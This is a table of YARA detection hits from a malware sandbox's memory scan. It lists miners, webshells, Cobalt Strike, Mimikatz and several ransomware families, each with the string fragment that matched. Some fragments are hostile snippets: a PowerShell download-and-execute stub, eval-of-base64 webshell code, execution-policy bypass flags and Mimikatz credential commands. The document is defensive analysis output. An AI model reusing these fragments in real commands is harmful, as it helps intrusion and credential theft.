00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x2f349:$payload_and_input1: eval(request. 0x2f329:$tagasp_short1: <%@ 0x2f347:$tagasp_short1: <%e 0x35e79:$tagasp_short1: <%\xC4 0x3eae6:$tagasp_short1: <%\x1D 0x1c67:$tagasp_short2: %> 0x109f7:$tagasp_short2: %> 0x11547:$tagasp_short2: %> 0x123a7:$tagasp_short2: %> 0x3a8b6:$tagasp_short2: %> 0x2f347:$tagasp_long13: <%ev
00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6290353787.00000197A39F4000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x11b39:$one6: Shell Environ$("COMSPEC") & " /c
00000024.00000003.6290353787.00000197A39F4000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x1a043:$r2: p^owershell
00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	SUSP_PowerShell_IEX_Download_Combo	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x170eb:$x1: iex ((new-object net.webclient).Download
00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x1a391:$sb1: -w Hidden 0x1a13d:$sb3: -windowstyle hidden 0x1a132:$sc2: -noprofile 0x1a11a:$se3: -ExecutionPolicy bypass
00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000024.00000003.6322218555.00000197A3016000.00000004.00000001.sdmp	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0x1f536:$: \\.\pipe\%s%s%d
00000024.00000003.6322218555.00000197A3016000.00000004.00000001.sdmp	JoeSecurity_RemComRemoteAdmin	Yara detected RemCom RemoteAdmin tool	Joe Security
00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x2ec46:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x2eb23:$rat2: rat.(Core).generateBeacon 0x2eb40:$rat3: rat.gJitter 0x2eb4e:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x2ebb4:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x2ec1c:$rat8: rat/modules/netsweeper.(Pinger).listen 0x2ec46:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x2ec74:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x2eafa:$winblows: rat/platforms/win.(winblows).GetStage
00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	REDLEAVES_CoreImplant_UniqueStrings	Strings identifying the core REDLEAVES RAT in its deobfuscated state	USG	0xf21:$unique4: red_autumnal_leaves_dllmain.dll 0xd6d:$unique7: \NamePipe_MoreWindows
00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x8a8:$a1: certutil -decode
00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	CobaltStrike_MZ_Launcher	Detects CobaltStrike MZ header ReflectiveLoader launcher	yara@s3c.za.net	0x21279:$mz_launcher: 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D
00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x35f9:$s1: stratum+tcp://
00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	WScriptShell_Case_Anomaly	Detects obfuscated wscript.shell commands	Florian Roth	0x3a3f:$s1: WScript.Shell").run
00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Ham_backdoor	unknown	Cylance Spear Team	0x658:$a: 8D 14 3E 8B 7D FC 8A 0C 11 32 0C 38 40 8B 7D 10 88 0A 8B 4D 08 3B C3
00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	malware_red_leaves_generic	Red Leaves malware, related to APT10	David Cannings	0xdd7:$: I can not start %s 0xe5f:$: dwConnectPort 0xe71:$: dwRemoteLanPort 0xe85:$: strRemoteLanAddress 0xe9d:$: strLocalConnectIp 0xd5d:$: \\.\pipe\NamePipe_MoreWindows 0xd9d:$: RedLeavesCMDSimulatorMutex 0xca0:$: (NT %d.%d Build %d) 0xf21:$: red_autumnal_leaves_dllmain.dll 0xbce:$: __data 0xbe2:$: __serial 0xbf8:$: __upt
00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	webshell_php_base64_encoded_payloads	php webshell containing base64 encoded payload	Arnim Rupp	0x14efc:$decode1: base64_decode 0x156c3:$decode1: base64_decode 0x157cc:$decode1: base64_decode 0x15819:$decode1: base64_decode 0x15837:$decode1: base64_decode 0xd158:$four1: zeXN0ZW 0x15e97:$php_short: <? 0x15e97:$php_new2: <?php
00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x156be:$payload7: eval(base64_decode( 0x15814:$payload7: eval(base64_decode( 0x15e97:$php_short: <? 0x15e97:$php_new2: <?php
00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x15e97:$new_php2: <?php 0x14a98:$dynamic1: $_session[md5($ 0x14b02:$dynamic1: $_session[md5($ 0x19870:$gen_bit_sus2: .replace(/y/g 0x2fd92:$gen_bit_sus11: "cmd.exe 0x38872:$gen_bit_sus29: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 0x14d6b:$gen_bit_sus35: crack 0x1566f:$gen_bit_sus46: shell_ 0x15e3e:$gen_bit_sus46: shell_ 0x13bb4:$gen_bit_sus47: Shell 0x15501:$gen_bit_sus47: Shell 0x17e5e:$gen_bit_sus47: Shell 0x2c4b7:$gen_bit_sus47: Shell 0x150e7:$gen_bit_sus50: bypass 0x1a240:$gen_bit_sus50: bypass 0x32316:$gen_bit_sus50: bypass 0x15f43:$gen_bit_sus60: "execute" 0x15df4:$gen_bit_sus69: $cmd 0x13cbf:$gen_much_sus8: Webshell 0x33510:$gen_much_sus15: antivirus 0x2c432:$gen_much_sus16: mcafee
00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	webshell_php_by_string_known_webshell	Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions.	Arnim Rupp	0x1602c:$pbs3: "b374k 0x14a1f:$pbs6: 0de664ecd2be02cdd54234a0d1229b43 0x15e97:$php_short: <? 0x15e97:$php_new2: <?php
00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x1c1ea:$s05: fce8890000006089e531d2648b52308b
00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp	webshell_php_obfuscated_encoding	PHP webshell obfuscated by encoding	Arnim Rupp	0xdd78:$enc_eval1: \x65\x76\x61\x6c\x28 0xdd78:$enc_eval2: \x65\x76\x61\x6c\x28 0x5676:$php_short: <? 0xc9ee:$php_short: <? 0xca79:$php_short: <? 0xcb04:$php_short: <? 0xfede:$php_short: <? 0x10d31:$php_short: <? 0x342da:$php_short: <? 0x3530f:$php_short: <? 0x36ab7:$php_short: <? 0x3a253:$php_short: <? 0x36ab7:$php_new2: <?php
00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x36ab7:$new_php2: <?php 0x363c2:$dynamic3: $_server[base64_decode(' 0xce4c:$gen_bit_sus11: "cmd.exe 0xced8:$gen_bit_sus11: "cmd.exe 0xcfef:$gen_bit_sus11: "cmd.exe 0xfdcb:$gen_bit_sus11: "cmd.exe 0x1ed35:$gen_bit_sus47: Shell 0x2e9d3:$gen_bit_sus47: Shell 0x212fd:$gen_bit_sus50: bypass 0x3621e:$gen_bit_sus50: bypass 0x36458:$gen_bit_sus59: 'cmd' 0x1dae3:$gen_bit_sus60: "execute" 0x1db1a:$gen_bit_sus60: "execute" 0x1c0ec:$gen_bit_sus62: Cyber 0x1c18c:$gen_bit_sus62: Cyber 0x34c4a:$gen_bit_sus69: $cmd 0xe1be:$gen_much_sus8: Webshell 0x25860:$gen_much_sus8: Webshell 0x35289:$gen_much_sus8: WebShell 0x35525:$gen_much_sus8: Webshell 0x36409:$gen_much_sus8: Webshell
00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0xdd78:$opbs77: \x65\x76\x61\x6c\x28 0x5676:$php_short: <? 0xc9ee:$php_short: <? 0xca79:$php_short: <? 0xcb04:$php_short: <? 0xfede:$php_short: <? 0x10d31:$php_short: <? 0x342da:$php_short: <? 0x3530f:$php_short: <? 0x36ab7:$php_short: <? 0x3a253:$php_short: <? 0x36ab7:$php_new2: <?php
00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x3b7f3:$s1: stratum+tcp://
00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	WScript_Shell_PowerShell_Combo	Detects malware from Middle Eastern campaign reported by Talos	Florian Roth	0x2343d:$s1: .CreateObject("WScript.Shell") 0x2d6ef:$s1: .CreateObject("WScript.Shell") 0x5ccd:$p1: powershell.exe 0x3afdf:$p1: powershell.exe
00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	HackTool_Samples	Hacktool	unknown	0x2a9e:$i: WPE-C1467211-7C89-49c5-801A-1D048E4014C4
00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x12960:$s1: stratum+tcp:// 0x1298b:$s1: stratum+tcp:// 0x13d17:$s1: stratum+tcp://
00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	MirageStrings	Mirage Identifying Strings	Seth Hardy	0x378b:$: Neo,welcome to the desert of real.
00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	Trojan_Win32_PlaKeylog_B	Keylogger component	Microsoft	0x2a2dd:$hook: C6 06 FF 46 C6 06 25 0x2a2e8:$dasm_engine: 80 C9 10 88 0E 8A CA 80 E1 07 43 88 56 03 80 F9 05
00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x38778:$s15: [+] OK! I Closed The Two Socket.
00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6331669561.00000197A4068000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x27498:$s1: stratum+tcp:// 0x280b4:$s1: stratum+tcp://
00000024.00000003.6331669561.00000197A4068000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000024.00000003.6285143119.00000197A4C44000.00000004.00000001.sdmp	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x1d676:$pdb1: \ADPassHunt\ 0x1d687:$pdb2: \ADPassHunt.pdb 0x1d69b:$s1: Usage: .\ADPassHunt.exe 0x1d6b7:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x1d6f7:$s3: [ADA] Searching for accounts with userpassword attribute 0x1d734:$s4: [GPP] Searching for passwords now
00000024.00000003.6285143119.00000197A4C44000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000024.00000003.6289584259.00000197A3F60000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x3b7f3:$s1: stratum+tcp://
00000024.00000003.6289584259.00000197A3F60000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6310770552.00000197A4B3C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp	HackTool_MSIL_SharPersist_2	unknown	FireEye	0xf2aa:$a1: SharPersist.lib 0xf2be:$a2: SharPersist.exe 0xf2d2:$b1: ERROR: Invalid hotkey location option given. 0xf303:$b2: ERROR: Invalid hotkey given. 0xf324:$b3: ERROR: Keepass configuration file not found. 0xf355:$b4: ERROR: Keepass configuration file was not found. 0xf38a:$b5: ERROR: That value already exists in: 0xf3b3:$b6: ERROR: Failed to delete hidden registry key. 0xf3e4:$pdb1: \SharPersist\ 0xf3f6:$pdb2: \SharPersist.pdb
00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0xb684:$sb1: -W hidden 0xb67f:$sc1: -nop 0xb68e:$sd2: -noninteractive 0xb672:$se2: -exec bypass 0xb672:$se4: -exec bypass
00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	JoeSecurity_Growtopia	Yara detected Growtopia	Joe Security
00000024.00000003.6329279249.00000197A33E4000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6329279249.00000197A33E4000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000024.00000003.6329279249.00000197A33E4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xdc54:$s1: stratum+tcp:// 0xddca:$s1: stratum+tcp://
00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	WScriptShell_Case_Anomaly	Detects obfuscated wscript.shell commands	Florian Roth	0xa67:$s1: wscript.shell").Run 0x133f:$s1: wscript.shell").Run
00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x39288:$s1: sekurlsa::msv 0x3930a:$s7: sekurlsa::ssp 0x392c9:$s11: sekurlsa::pth
00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x329d9:$payload4: eval(gzuncompress(base64_decode 0x17a1a:$php_short: <? 0x17a83:$php_short: <? 0x17aec:$php_short: <? 0x17b55:$php_short: <? 0x17bbe:$php_short: <? 0x1c093:$php_short: <? 0x20d39:$php_short: <? 0x40b28:$php_short: <? 0x17a1a:$php_new2: <?php 0x17a83:$php_new2: <?php 0x17aec:$php_new2: <?php 0x17b55:$php_new2: <?php 0x17bbe:$php_new2: <?php
00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x429d9:$payload4: eval(gzuncompress(base64_decode 0x27a1a:$php_short: <? 0x27a83:$php_short: <? 0x27aec:$php_short: <? 0x27b55:$php_short: <? 0x27bbe:$php_short: <? 0x2c093:$php_short: <? 0x30d39:$php_short: <? 0x50b28:$php_short: <? 0x27a1a:$php_new2: <?php 0x27a83:$php_new2: <?php 0x27aec:$php_new2: <?php 0x27b55:$php_new2: <?php 0x27bbe:$php_new2: <?php
00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x33e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x33ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x345bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x345ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x345fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x34b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x34b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6294532862.00000197A39F4000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x11b39:$one6: Shell Environ$("COMSPEC") & " /c
00000024.00000003.6294532862.00000197A39F4000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000024.00000003.6356061064.00000197A47A0000.00000004.00000001.sdmp	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x2ec46:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x2eb23:$rat2: rat.(Core).generateBeacon 0x2eb40:$rat3: rat.gJitter 0x2eb4e:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x2ebb4:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x2ec1c:$rat8: rat/modules/netsweeper.(Pinger).listen 0x2ec46:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x2ec74:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x2eafa:$winblows: rat/platforms/win.(winblows).GetStage
00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	webshell_php_generic	php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings	Arnim Rupp	0x26f36:$php_short: <? 0x26f75:$php_short: <? 0x26fb5:$php_short: <? 0x26ff8:$php_short: <? 0x27042:$php_short: <? 0x2735f:$php_short: <? 0x2744d:$php_short: <? 0x2753a:$php_short: <? 0x27593:$php_short: <? 0x27711:$php_short: <? 0x26f36:$php_new2: <?php 0x26f75:$php_new2: <?php 0x26fb5:$php_new2: <?php 0x26ff8:$php_new2: <?php 0x27042:$php_new2: <?php 0x2735f:$php_new2: <?php 0x2753a:$php_new2: <?php 0x27593:$php_new2: <?php 0x27711:$php_new2: <?php 0x27ace:$inp4: _POST[ 0x26f59:$cpayload1: eval($
00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x2791b:$payload_and_input1: eval(request. 0x26ed0:$tagasp_short1: <%e 0x26ee6:$tagasp_short1: <%\x90 0x274b3:$tagasp_short1: <%e 0x275ee:$tagasp_short1: <%e 0x278fc:$tagasp_short1: <%@ 0x27919:$tagasp_short1: <%e 0x63ea:$tagasp_short2: %> 0x1ca46:$tagasp_short2: %> 0x26ea5:$tagasp_short2: %> 0x26ece:$tagasp_short2: %> 0x26ee0:$tagasp_short2: %> 0x27602:$tagasp_short2: %> 0x27917:$tagasp_short2: %> 0x26ed0:$tagasp_long13: <%ev 0x274b3:$tagasp_long13: <%ev 0x275ee:$tagasp_long13: <%ev 0x27919:$tagasp_long13: <%ev
00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0xd4b7:$sb3: -WindowStyle Hidden 0x2ee14:$sb3: -Windowstyle hidden 0x2ee07:$se2: -exec bypass 0xd4cb:$se3: -ExecutionPolicy Bypass 0x2ee07:$se4: -exec bypass
00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x2e61b:$one6: Shell Environ$("COMSPEC") & " /c 0x2e6e2:$one6: Shell Environ$("COMSPEC") & " /c 0x2ec65:$one6: Shell Environ$("COMSPEC") & " /c 0x2ec86:$one7: echo " & Chr(32) & cmd & Chr(32) & " > " & Chr(34) 0x2ec18:$two5: NullRefrencedException 0x2ec30:$two6: error has occurred in user32.dll by 0x2ec18:$two7: NullRefrencedException
00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x329d9:$payload4: eval(gzuncompress(base64_decode 0x17a1a:$php_short: <? 0x17a83:$php_short: <? 0x17aec:$php_short: <? 0x17b55:$php_short: <? 0x17bbe:$php_short: <? 0x1c093:$php_short: <? 0x20d39:$php_short: <? 0x40b28:$php_short: <? 0x17a1a:$php_new2: <?php 0x17a83:$php_new2: <?php 0x17aec:$php_new2: <?php 0x17b55:$php_new2: <?php 0x17bbe:$php_new2: <?php
00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp	webshell_php_generic	php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings	Arnim Rupp	0x26f36:$php_short: <? 0x26f75:$php_short: <? 0x26fb5:$php_short: <? 0x26ff8:$php_short: <? 0x27042:$php_short: <? 0x2735f:$php_short: <? 0x2744d:$php_short: <? 0x2753a:$php_short: <? 0x27593:$php_short: <? 0x27711:$php_short: <? 0x26f36:$php_new2: <?php 0x26f75:$php_new2: <?php 0x26fb5:$php_new2: <?php 0x26ff8:$php_new2: <?php 0x27042:$php_new2: <?php 0x2735f:$php_new2: <?php 0x2753a:$php_new2: <?php 0x27593:$php_new2: <?php 0x27711:$php_new2: <?php 0x27ace:$inp4: _POST[ 0x26f59:$cpayload1: eval($
00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x2791b:$payload_and_input1: eval(request. 0x26ed0:$tagasp_short1: <%e 0x26ee6:$tagasp_short1: <%\x90 0x274b3:$tagasp_short1: <%e 0x275ee:$tagasp_short1: <%e 0x278fc:$tagasp_short1: <%@ 0x27919:$tagasp_short1: <%e 0x63ea:$tagasp_short2: %> 0x1ca46:$tagasp_short2: %> 0x26ea5:$tagasp_short2: %> 0x26ece:$tagasp_short2: %> 0x26ee0:$tagasp_short2: %> 0x27602:$tagasp_short2: %> 0x27917:$tagasp_short2: %> 0x26ed0:$tagasp_long13: <%ev 0x274b3:$tagasp_long13: <%ev 0x275ee:$tagasp_long13: <%ev 0x27919:$tagasp_long13: <%ev
00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0xd4b7:$sb3: -WindowStyle Hidden 0x2ee14:$sb3: -Windowstyle hidden 0x2ee07:$se2: -exec bypass 0xd4cb:$se3: -ExecutionPolicy Bypass 0x2ee07:$se4: -exec bypass
00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x2e61b:$one6: Shell Environ$("COMSPEC") & " /c 0x2e6e2:$one6: Shell Environ$("COMSPEC") & " /c 0x2ec65:$one6: Shell Environ$("COMSPEC") & " /c 0x2ec86:$one7: echo " & Chr(32) & cmd & Chr(32) & " > " & Chr(34) 0x2ec18:$two5: NullRefrencedException 0x2ec30:$two6: error has occurred in user32.dll by 0x2ec18:$two7: NullRefrencedException
00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x429d9:$payload4: eval(gzuncompress(base64_decode 0x2a84:$php_short: <? 0x7ac6:$php_short: <? 0x7e13:$php_short: <? 0x27a1a:$php_short: <? 0x27a83:$php_short: <? 0x27aec:$php_short: <? 0x27b55:$php_short: <? 0x27bbe:$php_short: <? 0x2c093:$php_short: <? 0x30d39:$php_short: <? 0x50b28:$php_short: <? 0x27a1a:$php_new2: <?php 0x27a83:$php_new2: <?php 0x27aec:$php_new2: <?php 0x27b55:$php_new2: <?php 0x27bbe:$php_new2: <?php
